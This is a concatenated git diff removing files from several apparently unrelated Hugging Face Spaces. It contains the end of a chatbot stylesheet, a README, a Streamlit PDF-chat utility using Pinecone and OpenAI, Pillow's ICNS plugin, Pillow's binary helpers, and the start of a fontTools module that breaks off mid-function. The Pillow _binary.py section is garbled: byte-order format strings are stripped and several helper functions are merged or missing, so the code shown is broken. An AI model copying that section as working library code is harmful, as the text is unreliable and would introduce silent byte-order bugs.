- top: 2px; - display: inline-block; - height: 24px; - position: relative; - width: 48px; - border-radius: 12px; -} -.apSwitch input { - display: none !important; -} -.apSlider { - background-color: var(--block-label-background-fill); - bottom: 0; - cursor: pointer; - left: 0; - position: absolute; - right: 0; - top: 0; - transition: .4s; - font-size: 18px; - border-radius: 12px; -} -.apSlider::before { - bottom: -1.5px; - left: 1px; - position: absolute; - transition: .4s; - content: "🌞"; -} -input:checked + .apSlider { - background-color: var(--block-label-background-fill); -} -input:checked + .apSlider::before { - transform: translateX(23px); - content:"🌚"; -} - -#submit_btn, #cancel_btn { - height: 42px !important; -} -#submit_btn::before { - content: url("data:image/svg+xml, %3Csvg width='21px' height='20px' viewBox='0 0 21 20' version='1.1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'%3E %3Cg id='page' stroke='none' stroke-width='1' fill='none' fill-rule='evenodd'%3E %3Cg id='send' transform='translate(0.435849, 0.088463)' fill='%23FFFFFF' fill-rule='nonzero'%3E %3Cpath d='M0.579148261,0.0428666046 C0.301105539,-0.0961547561 -0.036517765,0.122307382 0.0032026237,0.420210298 L1.4927172,18.1553639 C1.5125774,18.4334066 1.79062012,18.5922882 2.04880264,18.4929872 L8.24518329,15.8913017 L11.6412765,19.7441794 C11.8597387,19.9825018 12.2370824,19.8832008 12.3165231,19.5852979 L13.9450591,13.4882182 L19.7839562,11.0255541 C20.0619989,10.8865327 20.0818591,10.4694687 19.7839562,10.3105871 L0.579148261,0.0428666046 Z M11.6138902,17.0883151 L9.85385903,14.7195502 L0.718169621,0.618812241 L12.69945,12.9346347 L11.6138902,17.0883151 Z' id='shape'%3E%3C/path%3E %3C/g%3E %3C/g%3E %3C/svg%3E"); - height: 21px; -} -#cancel_btn::before { - content: url("data:image/svg+xml,%3Csvg width='21px' height='21px' viewBox='0 0 21 21' version='1.1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'%3E %3Cg id='pg' 
stroke='none' stroke-width='1' fill='none' fill-rule='evenodd'%3E %3Cpath d='M10.2072007,20.088463 C11.5727865,20.088463 12.8594566,19.8259823 14.067211,19.3010209 C15.2749653,18.7760595 16.3386126,18.0538087 17.2581528,17.1342685 C18.177693,16.2147282 18.8982283,15.1527965 19.4197586,13.9484733 C19.9412889,12.7441501 20.202054,11.4557644 20.202054,10.0833163 C20.202054,8.71773046 19.9395733,7.43106036 19.4146119,6.22330603 C18.8896505,5.01555169 18.1673997,3.95018885 17.2478595,3.0272175 C16.3283192,2.10424615 15.2646719,1.3837109 14.0569176,0.865611739 C12.8491633,0.34751258 11.5624932,0.088463 10.1969073,0.088463 C8.83132146,0.088463 7.54636692,0.34751258 6.34204371,0.865611739 C5.1377205,1.3837109 4.07407321,2.10424615 3.15110186,3.0272175 C2.22813051,3.95018885 1.5058797,5.01555169 0.984349419,6.22330603 C0.46281914,7.43106036 0.202054,8.71773046 0.202054,10.0833163 C0.202054,11.4557644 0.4645347,12.7441501 0.9894961,13.9484733 C1.5144575,15.1527965 2.23670831,16.2147282 3.15624854,17.1342685 C4.07578877,18.0538087 5.1377205,18.7760595 6.34204371,19.3010209 C7.54636692,19.8259823 8.83475258,20.088463 10.2072007,20.088463 Z M10.2072007,18.2562448 C9.07493099,18.2562448 8.01471483,18.0452309 7.0265522,17.6232031 C6.03838956,17.2011753 5.17031614,16.6161693 4.42233192,15.8681851 C3.6743477,15.1202009 3.09105726,14.2521274 2.67246059,13.2639648 C2.25386392,12.2758022 2.04456558,11.215586 2.04456558,10.0833163 C2.04456558,8.95104663 2.25386392,7.89083047 2.67246059,6.90266784 C3.09105726,5.9145052 3.6743477,5.04643178 4.42233192,4.29844756 C5.17031614,3.55046334 6.036674,2.9671729 7.02140552,2.54857623 C8.00613703,2.12997956 9.06463763,1.92068122 10.1969073,1.92068122 C11.329177,1.92068122 12.3911087,2.12997956 13.3827025,2.54857623 C14.3742962,2.9671729 15.2440852,3.55046334 15.9920694,4.29844756 C16.7400537,5.04643178 17.3233441,5.9145052 17.7419408,6.90266784 C18.1605374,7.89083047 18.3698358,8.95104663 18.3698358,10.0833163 C18.3698358,11.215586 
18.1605374,12.2758022 17.7419408,13.2639648 C17.3233441,14.2521274 16.7400537,15.1202009 15.9920694,15.8681851 C15.2440852,16.6161693 14.3760118,17.2011753 13.3878492,17.6232031 C12.3996865,18.0452309 11.3394704,18.2562448 10.2072007,18.2562448 Z M7.65444721,13.6242324 L12.7496608,13.6242324 C13.0584616,13.6242324 13.3003556,13.5384544 13.4753427,13.3668984 C13.6503299,13.1953424 13.7378234,12.9585951 13.7378234,12.6566565 L13.7378234,7.49968276 C13.7378234,7.19774418 13.6503299,6.96099688 13.4753427,6.78944087 C13.3003556,6.61788486 13.0584616,6.53210685 12.7496608,6.53210685 L7.65444721,6.53210685 C7.33878414,6.53210685 7.09345904,6.61788486 6.91847191,6.78944087 C6.74348478,6.96099688 6.65599121,7.19774418 6.65599121,7.49968276 L6.65599121,12.6566565 C6.65599121,12.9585951 6.74348478,13.1953424 6.91847191,13.3668984 C7.09345904,13.5384544 7.33878414,13.6242324 7.65444721,13.6242324 Z' id='shape' fill='%23FF3B30' fill-rule='nonzero'%3E%3C/path%3E %3C/g%3E %3C/svg%3E"); - height: 21px; -} -/* list */ -ol:not(.options), ul:not(.options) { - padding-inline-start: 2em !important; -} - -/* 亮色(默认) */ -#chuanhu_chatbot { - background-color: var(--chatbot-color-light) !important; - color: #000000 !important; -} -[data-testid = "bot"] { - background-color: #FFFFFF !important; -} -[data-testid = "user"] { - background-color: #95EC69 !important; -} -/* 暗色 */ -.dark #chuanhu_chatbot { - background-color: var(--chatbot-color-dark) !important; - color: #FFFFFF !important; -} -.dark [data-testid = "bot"] { - background-color: #2C2C2C !important; -} -.dark [data-testid = "user"] { - background-color: #26B561 !important; -} - -/* 屏幕宽度大于等于500px的设备 */ -/* update on 2023.4.8: 高度的细致调整已写入JavaScript */ -@media screen and (min-width: 500px) { - #chuanhu_chatbot { - height: calc(100vh - 200px); - } - #chuanhu_chatbot .wrap { - max-height: calc(100vh - 200px - var(--line-sm)*1rem - 2*var(--block-label-margin) ); - } -} -/* 屏幕宽度小于500px的设备 */ -@media screen and (max-width: 499px) { - 
#chuanhu_chatbot { - height: calc(100vh - 140px); - } - #chuanhu_chatbot .wrap { - max-height: calc(100vh - 140px - var(--line-sm)*1rem - 2*var(--block-label-margin) ); - } - [data-testid = "bot"] { - max-width: 98% !important; - } - #app_title h1{ - letter-spacing: -1px; font-size: 22px; - } -} -/* 对话气泡 */ -[class *= "message"] { - border-radius: var(--radius-xl) !important; - border: none; - padding: var(--spacing-xl) !important; - font-size: var(--text-md) !important; - line-height: var(--line-md) !important; - min-height: calc(var(--text-md)*var(--line-md) + 2*var(--spacing-xl)); - min-width: calc(var(--text-md)*var(--line-md) + 2*var(--spacing-xl)); -} -[data-testid = "bot"] { - max-width: 85%; - border-bottom-left-radius: 0 !important; -} -[data-testid = "user"] { - max-width: 85%; - width: auto !important; - border-bottom-right-radius: 0 !important; -} -/* 表格 */ -table { - margin: 1em 0; - border-collapse: collapse; - empty-cells: show; -} -td,th { - border: 1.2px solid var(--border-color-primary) !important; - padding: 0.2em; -} -thead { - background-color: rgba(175,184,193,0.2); -} -thead th { - padding: .5em .2em; -} -/* 行内代码 */ -code { - display: inline; - white-space: break-spaces; - border-radius: 6px; - margin: 0 2px 0 2px; - padding: .2em .4em .1em .4em; - background-color: rgba(175,184,193,0.2); -} -/* 代码块 */ -pre code { - display: block; - overflow: auto; - white-space: pre; - background-color: hsla(0, 0%, 0%, 80%)!important; - border-radius: 10px; - padding: 1.4em 1.2em 0em 1.4em; - margin: 1.2em 2em 1.2em 0.5em; - color: #FFF; - box-shadow: 6px 6px 16px hsla(0, 0%, 0%, 0.2); -} -/* 代码高亮样式 */ -.highlight .hll { background-color: #49483e } -.highlight .c { color: #75715e } /* Comment */ -.highlight .err { color: #960050; background-color: #1e0010 } /* Error */ -.highlight .k { color: #66d9ef } /* Keyword */ -.highlight .l { color: #ae81ff } /* Literal */ -.highlight .n { color: #f8f8f2 } /* Name */ -.highlight .o { color: #f92672 } /* Operator */ 
-.highlight .p { color: #f8f8f2 } /* Punctuation */ -.highlight .ch { color: #75715e } /* Comment.Hashbang */ -.highlight .cm { color: #75715e } /* Comment.Multiline */ -.highlight .cp { color: #75715e } /* Comment.Preproc */ -.highlight .cpf { color: #75715e } /* Comment.PreprocFile */ -.highlight .c1 { color: #75715e } /* Comment.Single */ -.highlight .cs { color: #75715e } /* Comment.Special */ -.highlight .gd { color: #f92672 } /* Generic.Deleted */ -.highlight .ge { font-style: italic } /* Generic.Emph */ -.highlight .gi { color: #a6e22e } /* Generic.Inserted */ -.highlight .gs { font-weight: bold } /* Generic.Strong */ -.highlight .gu { color: #75715e } /* Generic.Subheading */ -.highlight .kc { color: #66d9ef } /* Keyword.Constant */ -.highlight .kd { color: #66d9ef } /* Keyword.Declaration */ -.highlight .kn { color: #f92672 } /* Keyword.Namespace */ -.highlight .kp { color: #66d9ef } /* Keyword.Pseudo */ -.highlight .kr { color: #66d9ef } /* Keyword.Reserved */ -.highlight .kt { color: #66d9ef } /* Keyword.Type */ -.highlight .ld { color: #e6db74 } /* Literal.Date */ -.highlight .m { color: #ae81ff } /* Literal.Number */ -.highlight .s { color: #e6db74 } /* Literal.String */ -.highlight .na { color: #a6e22e } /* Name.Attribute */ -.highlight .nb { color: #f8f8f2 } /* Name.Builtin */ -.highlight .nc { color: #a6e22e } /* Name.Class */ -.highlight .no { color: #66d9ef } /* Name.Constant */ -.highlight .nd { color: #a6e22e } /* Name.Decorator */ -.highlight .ni { color: #f8f8f2 } /* Name.Entity */ -.highlight .ne { color: #a6e22e } /* Name.Exception */ -.highlight .nf { color: #a6e22e } /* Name.Function */ -.highlight .nl { color: #f8f8f2 } /* Name.Label */ -.highlight .nn { color: #f8f8f2 } /* Name.Namespace */ -.highlight .nx { color: #a6e22e } /* Name.Other */ -.highlight .py { color: #f8f8f2 } /* Name.Property */ -.highlight .nt { color: #f92672 } /* Name.Tag */ -.highlight .nv { color: #f8f8f2 } /* Name.Variable */ -.highlight .ow { color: #f92672 } /* 
Operator.Word */ -.highlight .w { color: #f8f8f2 } /* Text.Whitespace */ -.highlight .mb { color: #ae81ff } /* Literal.Number.Bin */ -.highlight .mf { color: #ae81ff } /* Literal.Number.Float */ -.highlight .mh { color: #ae81ff } /* Literal.Number.Hex */ -.highlight .mi { color: #ae81ff } /* Literal.Number.Integer */ -.highlight .mo { color: #ae81ff } /* Literal.Number.Oct */ -.highlight .sa { color: #e6db74 } /* Literal.String.Affix */ -.highlight .sb { color: #e6db74 } /* Literal.String.Backtick */ -.highlight .sc { color: #e6db74 } /* Literal.String.Char */ -.highlight .dl { color: #e6db74 } /* Literal.String.Delimiter */ -.highlight .sd { color: #e6db74 } /* Literal.String.Doc */ -.highlight .s2 { color: #e6db74 } /* Literal.String.Double */ -.highlight .se { color: #ae81ff } /* Literal.String.Escape */ -.highlight .sh { color: #e6db74 } /* Literal.String.Heredoc */ -.highlight .si { color: #e6db74 } /* Literal.String.Interpol */ -.highlight .sx { color: #e6db74 } /* Literal.String.Other */ -.highlight .sr { color: #e6db74 } /* Literal.String.Regex */ -.highlight .s1 { color: #e6db74 } /* Literal.String.Single */ -.highlight .ss { color: #e6db74 } /* Literal.String.Symbol */ -.highlight .bp { color: #f8f8f2 } /* Name.Builtin.Pseudo */ -.highlight .fm { color: #a6e22e } /* Name.Function.Magic */ -.highlight .vc { color: #f8f8f2 } /* Name.Variable.Class */ -.highlight .vg { color: #f8f8f2 } /* Name.Variable.Global */ -.highlight .vi { color: #f8f8f2 } /* Name.Variable.Instance */ -.highlight .vm { color: #f8f8f2 } /* Name.Variable.Magic */ -.highlight .il { color: #ae81ff } /* Literal.Number.Integer.Long */ diff --git a/spaces/daedalus314/quantum-lora-quote-generation/README.md b/spaces/daedalus314/quantum-lora-quote-generation/README.md deleted file mode 100644 index ce778077cfa90b9c38212ba8f6939c8fa3f7f018..0000000000000000000000000000000000000000 --- a/spaces/daedalus314/quantum-lora-quote-generation/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: 
Quantum Lora Quote Generation -emoji: 💻 -colorFrom: yellow -colorTo: pink -sdk: gradio -sdk_version: 3.35.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/darthPanda/chatpdf_app/utils.py b/spaces/darthPanda/chatpdf_app/utils.py deleted file mode 100644 index 38e737a6f2675407e4da46c507d8589e053003ea..0000000000000000000000000000000000000000 --- a/spaces/darthPanda/chatpdf_app/utils.py +++ /dev/null @@ -1,84 +0,0 @@ -from langchain.document_loaders import DirectoryLoader -from langchain.text_splitter import RecursiveCharacterTextSplitter -from langchain.embeddings import SentenceTransformerEmbeddings -from sentence_transformers import SentenceTransformer -import pinecone -from langchain.vectorstores import Pinecone -from langchain.document_loaders import PyPDFLoader -import tempfile -import streamlit as st -import openai - -# To create embeddings on hard disk -@st.cache_resource() -def get_embeddings_model(): - model = SentenceTransformer('all-MiniLM-L6-v2') - embeddings = SentenceTransformerEmbeddings(model_name="all-MiniLM-L6-v2") - return model, embeddings - -model, embeddings = get_embeddings_model() - -def ingest( - uploaded_document, - pinecone_api_key, - pinecone_env, - pinecone_index_namespace, - chunk_size=500, - chunk_overlap=20 - ): - with tempfile.NamedTemporaryFile(delete=False) as tf: - tf.write(uploaded_document.getbuffer()) - file_path = tf.name - loader = PyPDFLoader(file_path) - documents = loader.load() - text_splitter = RecursiveCharacterTextSplitter(chunk_size=chunk_size, chunk_overlap=chunk_overlap) - docs = text_splitter.split_documents(documents) - # embeddings = get_embeddings_model() - pinecone.init( - api_key=pinecone_api_key, - environment=pinecone_env - ) - index_name = pinecone_index_namespace - try: - index = Pinecone.from_documents(docs, embeddings, index_name=index_name) - st.success('Document uploaded to Pinecone database 
successfully') - except Exception as error_message: - st.error(error_message) - -# # To create embeddings on hard disk -# # !pip install chromadb -# # from langchain.vectorstores import Chroma -# # persist_directory = './data/embeddings' -# # vStore = Chroma.from_documents(docs, embeddings, persist_directory=persist_directory) - - -def query_refiner(conversation, query): - response = openai.Completion.create( - model="text-davinci-003", - prompt=f"Given the following user query and conversation log, formulate a question that would be the most relevant to provide the user with an answer from a knowledge base.\n\nCONVERSATION LOG: \n{conversation}\n\nQuery: {query}\n\nRefined Query:", - temperature=0.7, - max_tokens=256, - top_p=1, - frequency_penalty=0, - presence_penalty=0 - ) - return response['choices'][0]['text'] - - -def find_match(input, pinecone_api_key, pinecone_env, pinecone_index_namespace): - pinecone.init( - api_key=pinecone_api_key, - environment=pinecone_env - ) - index = pinecone.Index(pinecone_index_namespace) - input_em = model.encode(input).tolist() - result = index.query(input_em, top_k=2, includeMetadata=True) - return result['matches'][0]['metadata']['text']+"\n"+result['matches'][1]['metadata']['text'] - - -def get_conversation_string(): - conversation_string = "" - for i in range(len(st.session_state['responses'])-1): - conversation_string += "Human: "+st.session_state['requests'][i] + "\n" - conversation_string += "Bot: "+ st.session_state['responses'][i+1] + "\n" - return conversation_string \ No newline at end of file diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/PIL/IcnsImagePlugin.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/PIL/IcnsImagePlugin.py deleted file mode 100644 index 27cb89f735e2a1883b2b52ee42fd9ba34c5805fb..0000000000000000000000000000000000000000 --- 
a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/PIL/IcnsImagePlugin.py +++ /dev/null @@ -1,399 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# macOS icns file decoder, based on icns.py by Bob Ippolito. -# -# history: -# 2004-10-09 fl Turned into a PIL plugin; removed 2.3 dependencies. -# 2020-04-04 Allow saving on all operating systems. -# -# Copyright (c) 2004 by Bob Ippolito. -# Copyright (c) 2004 by Secret Labs. -# Copyright (c) 2004 by Fredrik Lundh. -# Copyright (c) 2014 by Alastair Houghton. -# Copyright (c) 2020 by Pan Jing. -# -# See the README file for information on usage and redistribution. -# - -import io -import os -import struct -import sys - -from . import Image, ImageFile, PngImagePlugin, features - -enable_jpeg2k = features.check_codec("jpg_2000") -if enable_jpeg2k: - from . import Jpeg2KImagePlugin - -MAGIC = b"icns" -HEADERSIZE = 8 - - -def nextheader(fobj): - return struct.unpack(">4sI", fobj.read(HEADERSIZE)) - - -def read_32t(fobj, start_length, size): - # The 128x128 icon seems to have an extra header for some reason. - (start, length) = start_length - fobj.seek(start) - sig = fobj.read(4) - if sig != b"\x00\x00\x00\x00": - msg = "Unknown signature, expecting 0x00000000" - raise SyntaxError(msg) - return read_32(fobj, (start + 4, length - 4), size) - - -def read_32(fobj, start_length, size): - """ - Read a 32bit RGB icon resource. Seems to be either uncompressed or - an RLE packbits-like scheme. 
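The `nextheader`/`IcnsFile.__init__` pair above walks an icns container as a flat sequence of big-endian `(4-byte tag, 4-byte length)` chunk headers, where each length includes the 8 header bytes themselves. That traversal can be sketched in isolation like this (a hand-built two-chunk container for illustration; the tag names follow the `SIZES` table above):

```python
import io
import struct

HEADERSIZE = 8

def iter_icns_blocks(data):
    """Yield (tag, payload) for each block in an icns-style container.
    Every header is big-endian: 4-byte tag + 4-byte total block length,
    the length counting the 8 header bytes themselves."""
    fobj = io.BytesIO(data)
    magic, filesize = struct.unpack(">4sI", fobj.read(HEADERSIZE))
    i = HEADERSIZE
    while i < filesize:
        sig, blocksize = struct.unpack(">4sI", fobj.read(HEADERSIZE))
        yield sig, fobj.read(blocksize - HEADERSIZE)
        i += blocksize

# Tiny hand-built container: 'icns' file header wrapping one 'ic07' block.
payload = b"\x01\x02\x03"
block = b"ic07" + struct.pack(">I", HEADERSIZE + len(payload)) + payload
data = b"icns" + struct.pack(">I", HEADERSIZE + len(block)) + block
print(list(iter_icns_blocks(data)))  # [(b'ic07', b'\x01\x02\x03')]
```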
- """ - (start, length) = start_length - fobj.seek(start) - pixel_size = (size[0] * size[2], size[1] * size[2]) - sizesq = pixel_size[0] * pixel_size[1] - if length == sizesq * 3: - # uncompressed ("RGBRGBGB") - indata = fobj.read(length) - im = Image.frombuffer("RGB", pixel_size, indata, "raw", "RGB", 0, 1) - else: - # decode image - im = Image.new("RGB", pixel_size, None) - for band_ix in range(3): - data = [] - bytesleft = sizesq - while bytesleft > 0: - byte = fobj.read(1) - if not byte: - break - byte = byte[0] - if byte & 0x80: - blocksize = byte - 125 - byte = fobj.read(1) - for i in range(blocksize): - data.append(byte) - else: - blocksize = byte + 1 - data.append(fobj.read(blocksize)) - bytesleft -= blocksize - if bytesleft <= 0: - break - if bytesleft != 0: - msg = f"Error reading channel [{repr(bytesleft)} left]" - raise SyntaxError(msg) - band = Image.frombuffer("L", pixel_size, b"".join(data), "raw", "L", 0, 1) - im.im.putband(band.im, band_ix) - return {"RGB": im} - - -def read_mk(fobj, start_length, size): - # Alpha masks seem to be uncompressed - start = start_length[0] - fobj.seek(start) - pixel_size = (size[0] * size[2], size[1] * size[2]) - sizesq = pixel_size[0] * pixel_size[1] - band = Image.frombuffer("L", pixel_size, fobj.read(sizesq), "raw", "L", 0, 1) - return {"A": band} - - -def read_png_or_jpeg2000(fobj, start_length, size): - (start, length) = start_length - fobj.seek(start) - sig = fobj.read(12) - if sig[:8] == b"\x89PNG\x0d\x0a\x1a\x0a": - fobj.seek(start) - im = PngImagePlugin.PngImageFile(fobj) - Image._decompression_bomb_check(im.size) - return {"RGBA": im} - elif ( - sig[:4] == b"\xff\x4f\xff\x51" - or sig[:4] == b"\x0d\x0a\x87\x0a" - or sig == b"\x00\x00\x00\x0cjP \x0d\x0a\x87\x0a" - ): - if not enable_jpeg2k: - msg = ( - "Unsupported icon subimage format (rebuild PIL " - "with JPEG 2000 support to fix this)" - ) - raise ValueError(msg) - # j2k, jpc or j2c - fobj.seek(start) - jp2kstream = fobj.read(length) - f = 
io.BytesIO(jp2kstream) - im = Jpeg2KImagePlugin.Jpeg2KImageFile(f) - Image._decompression_bomb_check(im.size) - if im.mode != "RGBA": - im = im.convert("RGBA") - return {"RGBA": im} - else: - msg = "Unsupported icon subimage format" - raise ValueError(msg) - - -class IcnsFile: - SIZES = { - (512, 512, 2): [(b"ic10", read_png_or_jpeg2000)], - (512, 512, 1): [(b"ic09", read_png_or_jpeg2000)], - (256, 256, 2): [(b"ic14", read_png_or_jpeg2000)], - (256, 256, 1): [(b"ic08", read_png_or_jpeg2000)], - (128, 128, 2): [(b"ic13", read_png_or_jpeg2000)], - (128, 128, 1): [ - (b"ic07", read_png_or_jpeg2000), - (b"it32", read_32t), - (b"t8mk", read_mk), - ], - (64, 64, 1): [(b"icp6", read_png_or_jpeg2000)], - (32, 32, 2): [(b"ic12", read_png_or_jpeg2000)], - (48, 48, 1): [(b"ih32", read_32), (b"h8mk", read_mk)], - (32, 32, 1): [ - (b"icp5", read_png_or_jpeg2000), - (b"il32", read_32), - (b"l8mk", read_mk), - ], - (16, 16, 2): [(b"ic11", read_png_or_jpeg2000)], - (16, 16, 1): [ - (b"icp4", read_png_or_jpeg2000), - (b"is32", read_32), - (b"s8mk", read_mk), - ], - } - - def __init__(self, fobj): - """ - fobj is a file-like object as an icns resource - """ - # signature : (start, length) - self.dct = dct = {} - self.fobj = fobj - sig, filesize = nextheader(fobj) - if not _accept(sig): - msg = "not an icns file" - raise SyntaxError(msg) - i = HEADERSIZE - while i < filesize: - sig, blocksize = nextheader(fobj) - if blocksize <= 0: - msg = "invalid block header" - raise SyntaxError(msg) - i += HEADERSIZE - blocksize -= HEADERSIZE - dct[sig] = (i, blocksize) - fobj.seek(blocksize, io.SEEK_CUR) - i += blocksize - - def itersizes(self): - sizes = [] - for size, fmts in self.SIZES.items(): - for fmt, reader in fmts: - if fmt in self.dct: - sizes.append(size) - break - return sizes - - def bestsize(self): - sizes = self.itersizes() - if not sizes: - msg = "No 32bit icon resources found" - raise SyntaxError(msg) - return max(sizes) - - def dataforsize(self, size): - """ - Get an icon 
resource as {channel: array}. Note that - the arrays are bottom-up like windows bitmaps and will likely - need to be flipped or transposed in some way. - """ - dct = {} - for code, reader in self.SIZES[size]: - desc = self.dct.get(code) - if desc is not None: - dct.update(reader(self.fobj, desc, size)) - return dct - - def getimage(self, size=None): - if size is None: - size = self.bestsize() - if len(size) == 2: - size = (size[0], size[1], 1) - channels = self.dataforsize(size) - - im = channels.get("RGBA", None) - if im: - return im - - im = channels.get("RGB").copy() - try: - im.putalpha(channels["A"]) - except KeyError: - pass - return im - - -## -# Image plugin for Mac OS icons. - - -class IcnsImageFile(ImageFile.ImageFile): - """ - PIL image support for Mac OS .icns files. - Chooses the best resolution, but will possibly load - a different size image if you mutate the size attribute - before calling 'load'. - - The info dictionary has a key 'sizes' that is a list - of sizes that the icns file has. 
- """ - - format = "ICNS" - format_description = "Mac OS icns resource" - - def _open(self): - self.icns = IcnsFile(self.fp) - self.mode = "RGBA" - self.info["sizes"] = self.icns.itersizes() - self.best_size = self.icns.bestsize() - self.size = ( - self.best_size[0] * self.best_size[2], - self.best_size[1] * self.best_size[2], - ) - - @property - def size(self): - return self._size - - @size.setter - def size(self, value): - info_size = value - if info_size not in self.info["sizes"] and len(info_size) == 2: - info_size = (info_size[0], info_size[1], 1) - if ( - info_size not in self.info["sizes"] - and len(info_size) == 3 - and info_size[2] == 1 - ): - simple_sizes = [ - (size[0] * size[2], size[1] * size[2]) for size in self.info["sizes"] - ] - if value in simple_sizes: - info_size = self.info["sizes"][simple_sizes.index(value)] - if info_size not in self.info["sizes"]: - msg = "This is not one of the allowed sizes of this image" - raise ValueError(msg) - self._size = value - - def load(self): - if len(self.size) == 3: - self.best_size = self.size - self.size = ( - self.best_size[0] * self.best_size[2], - self.best_size[1] * self.best_size[2], - ) - - px = Image.Image.load(self) - if self.im is not None and self.im.size == self.size: - # Already loaded - return px - self.load_prepare() - # This is likely NOT the best way to do it, but whatever. - im = self.icns.getimage(self.best_size) - - # If this is a PNG or JPEG 2000, it won't be loaded yet - px = im.load() - - self.im = im.im - self.mode = im.mode - self.size = im.size - - return px - - -def _save(im, fp, filename): - """ - Saves the image as a series of PNG files, - that are then combined into a .icns file. 
- """ - if hasattr(fp, "flush"): - fp.flush() - - sizes = { - b"ic07": 128, - b"ic08": 256, - b"ic09": 512, - b"ic10": 1024, - b"ic11": 32, - b"ic12": 64, - b"ic13": 256, - b"ic14": 512, - } - provided_images = {im.width: im for im in im.encoderinfo.get("append_images", [])} - size_streams = {} - for size in set(sizes.values()): - image = ( - provided_images[size] - if size in provided_images - else im.resize((size, size)) - ) - - temp = io.BytesIO() - image.save(temp, "png") - size_streams[size] = temp.getvalue() - - entries = [] - for type, size in sizes.items(): - stream = size_streams[size] - entries.append( - {"type": type, "size": HEADERSIZE + len(stream), "stream": stream} - ) - - # Header - fp.write(MAGIC) - file_length = HEADERSIZE # Header - file_length += HEADERSIZE + 8 * len(entries) # TOC - file_length += sum(entry["size"] for entry in entries) - fp.write(struct.pack(">i", file_length)) - - # TOC - fp.write(b"TOC ") - fp.write(struct.pack(">i", HEADERSIZE + len(entries) * HEADERSIZE)) - for entry in entries: - fp.write(entry["type"]) - fp.write(struct.pack(">i", entry["size"])) - - # Data - for entry in entries: - fp.write(entry["type"]) - fp.write(struct.pack(">i", entry["size"])) - fp.write(entry["stream"]) - - if hasattr(fp, "flush"): - fp.flush() - - -def _accept(prefix): - return prefix[:4] == MAGIC - - -Image.register_open(IcnsImageFile.format, IcnsImageFile, _accept) -Image.register_extension(IcnsImageFile.format, ".icns") - -Image.register_save(IcnsImageFile.format, _save) -Image.register_mime(IcnsImageFile.format, "image/icns") - -if __name__ == "__main__": - if len(sys.argv) < 2: - print("Syntax: python3 IcnsImagePlugin.py [file]") - sys.exit() - - with open(sys.argv[1], "rb") as fp: - imf = IcnsImageFile(fp) - for size in imf.info["sizes"]: - imf.size = size - imf.save("out-%s-%s-%s.png" % size) - with Image.open(sys.argv[1]) as im: - im.save("out.png") - if sys.platform == "windows": - os.startfile("out.png") diff --git 
a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/PIL/_binary.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/PIL/_binary.py deleted file mode 100644 index a74ee9eb6f341aca9e074c0acc4b306a354175a0..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/PIL/_binary.py +++ /dev/null @@ -1,102 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# Binary input/output support routines. -# -# Copyright (c) 1997-2003 by Secret Labs AB -# Copyright (c) 1995-2003 by Fredrik Lundh -# Copyright (c) 2012 by Brian Crowell -# -# See the README file for information on usage and redistribution. -# - - -"""Binary input/output support routines.""" - - -from struct import pack, unpack_from - - -def i8(c): - return c if c.__class__ is int else c[0] - - -def o8(i): - return bytes((i & 255,)) - - -# Input, le = little endian, be = big endian -def i16le(c, o=0): - """ - Converts a 2-bytes (16 bits) string to an unsigned integer. - - :param c: string containing bytes to convert - :param o: offset of bytes to convert in string - """ - return unpack_from("h", c, o)[0] - - -def i32le(c, o=0): - """ - Converts a 4-bytes (32 bits) string to an unsigned integer. 
- - :param c: string containing bytes to convert - :param o: offset of bytes to convert in string - """ - return unpack_from("H", c, o)[0] - - -def i32be(c, o=0): - return unpack_from(">I", c, o)[0] - - -# Output, le = little endian, be = big endian -def o16le(i): - return pack("H", i) - - -def o32be(i): - return pack(">I", i) diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/fontTools/misc/textTools.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/fontTools/misc/textTools.py deleted file mode 100644 index f7ca1acc9b762e1ffcfefd22a399927f8369a056..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/fontTools/misc/textTools.py +++ /dev/null @@ -1,155 +0,0 @@ -"""fontTools.misc.textTools.py -- miscellaneous routines.""" - - -import ast -import string - - -# alias kept for backward compatibility -safeEval = ast.literal_eval - - -class Tag(str): - @staticmethod - def transcode(blob): - if isinstance(blob, bytes): - blob = blob.decode("latin-1") - return blob - - def __new__(self, content): - return str.__new__(self, self.transcode(content)) - - def __ne__(self, other): - return not self.__eq__(other) - - def __eq__(self, other): - return str.__eq__(self, self.transcode(other)) - - def __hash__(self): - return str.__hash__(self) - - def tobytes(self): - return self.encode("latin-1") - - -def readHex(content): - """Convert a list of hex strings to binary data.""" - return deHexStr(strjoin(chunk for chunk in content if isinstance(chunk, str))) - - -def deHexStr(hexdata): - """Convert a hex string to binary data.""" - hexdata = strjoin(hexdata.split()) - if len(hexdata) % 2: - hexdata = hexdata + "0" - data = [] - for i in range(0, len(hexdata), 2): - data.append(bytechr(int(hexdata[i : i + 2], 16))) - return bytesjoin(data) - - -def hexStr(data): - """Convert binary data to a hex string.""" - h = string.hexdigits - r = "" - for c in 
